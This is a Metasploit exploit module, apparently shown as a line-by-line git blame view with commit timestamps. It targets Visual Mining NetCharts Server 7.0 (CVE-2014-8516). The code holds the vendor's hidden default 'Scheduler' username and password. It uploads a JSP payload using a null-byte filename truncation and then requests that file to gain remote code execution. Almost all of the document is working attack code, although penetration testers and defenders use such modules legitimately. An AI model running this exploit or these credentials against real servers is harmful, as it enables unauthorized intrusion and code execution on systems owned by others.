2014-11-05 21:31:20 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
2014-11-05 21:31:20 +00:00
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
include Msf::Exploit::FileDropper
|
|
|
|
|
|
|
|
DEFAULT_USERNAME = 'Scheduler'
|
|
|
|
DEFAULT_PASSWORD = '!@#$scheduler$#@!'
|
|
|
|
SIGNATURE = 'was uploaded successfully and is now ready for installation'
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Visual Mining NetCharts Server Remote Code Execution',
|
|
|
|
'Description' => %q{
|
2014-11-07 04:50:20 +00:00
|
|
|
This module exploits multiple vulnerabilities in Visual Mining NetCharts.
|
|
|
|
First, a lack of input validation in the administration console permits
|
|
|
|
arbitrary jsp code upload to locations accessible later through the web
|
|
|
|
service. Authentication is typically required, however a 'hidden' user is
|
2014-11-13 20:48:23 +00:00
|
|
|
available by default (and non-editable). This user, named 'Scheduler',
|
2014-11-07 04:50:20 +00:00
|
|
|
can only login to the console after any modification in the user
|
|
|
|
database (a user is added, admin password is changed etc). If the
|
|
|
|
'Scheduler' user isn't available valid credentials must be supplied. The
|
|
|
|
default Admin password is Admin.
|
2014-11-05 21:31:20 +00:00
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'sghctoma', # Vulnerability Discovery
|
|
|
|
'juan vazquez' # Metasploit module
|
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['CVE', '2014-8516'],
|
|
|
|
['ZDI', '14-372']
|
|
|
|
],
|
|
|
|
'Privileged' => true,
|
|
|
|
'Platform' => %w{ linux win },
|
|
|
|
'Arch' => ARCH_JAVA,
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
['Visual Mining NetCharts Server 7.0', {}]
|
|
|
|
],
|
|
|
|
'DefaultTarget' => 0,
|
|
|
|
'DisclosureDate' => 'Nov 03 2014'))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(8001),
|
|
|
|
OptString.new('USERNAME', [false, "The username to authenticate with"]),
|
|
|
|
OptString.new('PASSWORD', [false, "The password to authenticate with"])
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def check
|
|
|
|
res = send_request_cgi({
|
|
|
|
'method' => 'GET',
|
|
|
|
'uri' => normalize_uri('/', 'Admin', 'archive', 'upload.jsp'),
|
|
|
|
'vars_get' => { 'mode' => 'getZip' },
|
|
|
|
'authorization' => basic_auth(username, password)
|
|
|
|
})
|
|
|
|
|
|
|
|
if res && res.code == 200 && res.body && res.body.to_s.include?(SIGNATURE)
|
2014-11-07 04:50:20 +00:00
|
|
|
Exploit::CheckCode::Detected
|
|
|
|
else
|
|
|
|
Exploit::CheckCode::Safe
|
2014-11-05 21:31:20 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
|
2016-02-01 21:12:03 +00:00
|
|
|
print_status("Uploading JSP payload #{jsp_payload}...")
|
2014-11-05 21:31:20 +00:00
|
|
|
if upload(jsp_payload, payload.encoded)
|
2016-02-01 21:12:03 +00:00
|
|
|
print_good("JSP payload uploaded successfully")
|
2014-11-05 21:46:33 +00:00
|
|
|
register_file_for_cleanup("./webapps/Admin/archive/ArchiveCache/#{jsp_payload}")
|
2014-11-05 21:31:20 +00:00
|
|
|
else
|
|
|
|
fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
|
|
|
|
end
|
|
|
|
|
2016-02-01 21:12:03 +00:00
|
|
|
print_status("Executing payload...")
|
2014-11-05 21:31:20 +00:00
|
|
|
execute(jsp_payload, 1)
|
|
|
|
end
|
|
|
|
|
|
|
|
def execute(jsp_name, time_out = 20)
|
|
|
|
res = send_request_cgi({
|
|
|
|
'uri' => normalize_uri('/', 'Admin', 'archive', 'ArchiveCache', jsp_name),
|
|
|
|
'method' => 'GET',
|
|
|
|
'authorization' => basic_auth(username, password)
|
|
|
|
}, time_out)
|
|
|
|
|
|
|
|
res
|
|
|
|
end
|
|
|
|
|
|
|
|
def upload(file_name, contents)
|
|
|
|
post_data = Rex::MIME::Message.new
|
|
|
|
post_data.add_part(
|
|
|
|
contents,
|
|
|
|
'application/octet-stream',
|
|
|
|
nil,
|
|
|
|
"form-data; name=\"FILE1\"; filename=\"#{file_name}\x00Archive0101140101.zip\""
|
|
|
|
)
|
|
|
|
|
|
|
|
res = send_request_cgi({
|
|
|
|
'uri' => normalize_uri("/", 'Admin', 'archive', 'upload.jsp'),
|
|
|
|
'method' => 'GET',
|
|
|
|
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
|
|
|
|
'data' => post_data.to_s,
|
|
|
|
'vars_get' => { 'mode' => 'getZip' },
|
|
|
|
'authorization' => basic_auth(username, password)
|
|
|
|
})
|
|
|
|
|
|
|
|
if res && res.code == 200 && res.body && res.body.to_s.include?(SIGNATURE)
|
2014-11-07 04:50:20 +00:00
|
|
|
true
|
|
|
|
else
|
|
|
|
false
|
2014-11-05 21:31:20 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def username
|
2014-11-07 04:50:20 +00:00
|
|
|
datastore['USERNAME'].blank? ? DEFAULT_USERNAME : datastore['USERNAME']
|
2014-11-05 21:31:20 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def password
|
2014-11-07 04:50:20 +00:00
|
|
|
datastore['PASSWORD'].blank? ? DEFAULT_PASSWORD : datastore['PASSWORD']
|
2014-11-05 21:31:20 +00:00
|
|
|
end
|
|
|
|
end
|